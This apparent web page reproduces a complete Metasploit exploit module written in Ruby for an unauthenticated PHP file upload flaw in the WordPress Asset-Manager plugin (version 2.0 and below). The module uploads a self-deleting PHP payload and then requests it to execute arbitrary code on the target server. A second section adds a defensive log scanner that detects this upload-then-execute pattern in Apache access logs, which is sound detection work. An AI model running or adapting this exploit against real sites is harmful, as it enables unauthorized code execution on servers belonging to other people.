This module, from the Metasploit exploit library, targets a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin accepts PHP file uploads: a user can upload a file to a temporary directory without authentication, which leads to arbitrary code execution.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts'   # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.hack1990.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    # Normalize the base path so that it ends with a slash
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Build the multipart body carrying the payload in the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Request the uploaded file from the plugin's temp directory
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
```
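
The two requests the module sends (a POST to the plugin's upload.php answered with 200, then a GET for a .php file under uploads/assets/temp/) leave a recognizable pair in the web server access log. The scanner below is an added example for defenders, not part of the Metasploit module or the original page. The Apache combined log format, the constructed sample lines, and the names `scan_access_log` and `Finding` are assumptions.

```ruby
# Added example: flag the upload-then-request pattern in web access logs.
# The log lines below are constructed samples in Apache combined format.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [26/May/2012:10:01:02 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 31 "-" "-"
  203.0.113.7 - - [26/May/2012:10:01:03 +0000] "GET /wordpress/wp-content/uploads/assets/temp/AbCdE.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.4 - - [26/May/2012:10:05:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 5120 "-" "-"
  198.51.100.9 - - [26/May/2012:10:06:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 404 0 "-" "-"
  192.0.2.15 - - [26/May/2012:10:07:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/x.php?c=1 HTTP/1.1" 200 12 "-" "-"
LOG

LINE_RE   = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /
UPLOAD_RE = %r{/wp-content/plugins/asset-manager/upload\.php\z}i
EXEC_RE   = %r{/wp-content/uploads/assets/temp/[^/]+\.(?:php\d?|phtml|phar)\z}i

Finding = Struct.new(:severity, :ip, :ts, :reason)

def scan_access_log(text)
  uploaders = {}   # client IP => timestamp of its last accepted upload POST
  findings  = []
  text.each_line do |line|
    m = LINE_RE.match(line) or next          # skip lines that do not parse
    path = m[:path].split('?', 2).first      # ignore the query string when matching
    status = m[:status].to_i
    if m[:method] == 'POST' && path =~ UPLOAD_RE
      if status == 200
        uploaders[m[:ip]] = m[:ts]
        findings << Finding.new(:medium, m[:ip], m[:ts], 'POST accepted by asset-manager upload.php')
      else
        findings << Finding.new(:low, m[:ip], m[:ts], "probe of upload.php (HTTP #{status})")
      end
    elsif path =~ EXEC_RE
      sev = uploaders.key?(m[:ip]) ? :high : :medium
      why = sev == :high ? 'script in temp dir requested after upload from same client' :
                           'script requested from asset temp dir'
      findings << Finding.new(sev, m[:ip], m[:ts], why)
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_LOG).each { |f| puts format('%-6s %-15s %s  %s', f.severity, f.ip, f.ts, f.reason) }
end
```

Because the module builds its payload with `:unlink_self`, the uploaded file may no longer be on disk afterwards, so the access log is a more dependable source than a scan of the temp directory.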